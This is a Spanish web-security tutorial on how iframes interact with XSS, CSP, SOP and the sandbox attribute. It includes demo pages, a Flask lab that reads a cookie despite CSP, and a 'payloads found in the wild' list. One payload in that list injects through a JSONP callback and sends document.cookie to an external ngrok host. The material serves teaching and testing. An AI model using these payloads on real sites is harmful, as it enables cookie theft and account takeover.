Iframes en XSS, CSP y SOP

Iframes en XSS

Hay 3 formas de indicar el contenido de una página en un iframe:

• A través de src indicando una URL (la URL puede ser de origen cruzado o del mismo origen)
• A través de src indicando el contenido usando el protocolo data:
• A través de srcdoc indicando el contenido

Accediendo a las variables de Padre e Hijo

<html>
<script>
var secret = "31337s3cr37t"
</script>

<iframe id="if1" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe id="if2" src="child.html"></iframe>
<iframe
id="if3"
srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe
id="if4"
src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>

<script>
function access_children_vars() {
alert(if1.secret)
alert(if2.secret)
alert(if3.secret)
alert(if4.secret)
}
setTimeout(access_children_vars, 3000)
</script>
</html>

<!-- content of child.html -->
<script>
var secret = "child secret"
alert(parent.secret)
</script>

Si accedes al html anterior a través de un servidor http (como python3 -m http.server), notarás que todos los scripts se ejecutarán (ya que no hay CSP que lo impida). el padre no podrá acceder a la variable secret dentro de ningún iframe y solo los iframes if2 e if3 (que se consideran del mismo sitio) pueden acceder al secreto en la ventana original.
Nota cómo if4 se considera que tiene origen null.

Iframes con CSP

El valor self de script-src no permitirá la ejecución del código JS utilizando el protocolo data: o el atributo srcdoc.
Sin embargo, incluso el valor none del CSP permitirá la ejecución de los iframes que pongan una URL (completa o solo la ruta) en el atributo src.
Por lo tanto, es posible eludir el CSP de una página con:

<html>
<head>
<meta
http-equiv="Content-Security-Policy"
content="script-src 'sha256-iF/bMbiFXal+AAl9tF8N6+KagNWdMlnhLqWkjAocLsk='" />
</head>
<script>
var secret = "31337s3cr37t"
</script>
<iframe id="if1" src="child.html"></iframe>
<iframe id="if2" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe
id="if3"
srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe
id="if4"
src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
</html>

Nota cómo el CSP anterior solo permite la ejecución del script en línea.
Sin embargo, solo se van a ejecutar los scripts if1 y if2, pero solo if1 podrá acceder al secreto del padre.

Por lo tanto, es posible eludir un CSP si puedes subir un archivo JS al servidor y cargarlo a través de un iframe incluso con script-src 'none'. Esto potencialmente también se puede hacer abusando de un endpoint JSONP de mismo sitio.

Puedes probar esto con el siguiente escenario donde se roba una cookie incluso con script-src 'none'. Simplemente ejecuta la aplicación y accede a ella con tu navegador:

import flask
from flask import Flask
app = Flask(__name__)

@app.route("/")
def index():
resp = flask.Response('<html><iframe id="if1" src="cookie_s.html"></iframe></html>')
resp.headers['Content-Security-Policy'] = "script-src 'self'"
resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET'
return resp

@app.route("/cookie_s.html")
def cookie_s():
return "<script>alert(document.cookie)</script>"

if __name__ == "__main__":
app.run()

Otros Payloads encontrados en la naturaleza

<!-- This one requires the data: scheme to be allowed -->
<iframe
srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
<!-- This one injects JS in a jsonp endppoint -->
<iframe srcdoc='
<script src="/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
<!-- sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)-->
<iframe
src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>

Iframe sandbox

El contenido dentro de un iframe puede estar sujeto a restricciones adicionales mediante el uso del atributo sandbox. Por defecto, este atributo no se aplica, lo que significa que no hay restricciones en su lugar.

Cuando se utiliza, el atributo sandbox impone varias limitaciones:

• El contenido se trata como si proviniera de una fuente única.
• Cualquier intento de enviar formularios es bloqueado.
• La ejecución de scripts está prohibida.
• El acceso a ciertas APIs está deshabilitado.
• Evita que los enlaces interactúen con otros contextos de navegación.
• El uso de plugins a través de <embed>, <object>, <applet>, o etiquetas similares está prohibido.
• Se impide que el contenido navegue por el contexto de navegación de nivel superior por sí mismo.
• Las características que se activan automáticamente, como la reproducción de video o el enfoque automático de los controles de formulario, están bloqueadas.

El valor del atributo puede dejarse vacío (sandbox="") para aplicar todas las restricciones mencionadas anteriormente. Alternativamente, puede establecerse en una lista de valores específicos separados por espacios que eximan al iframe de ciertas restricciones.

<iframe src="demo_iframe_sandbox.htm" sandbox></iframe>

Iframes en SOP

Revisa las siguientes páginas:

Bypassing SOP with Iframes - 1

Bypassing SOP with Iframes - 2

Blocking main page to steal postmessage

Steal postmessage modifying iframe location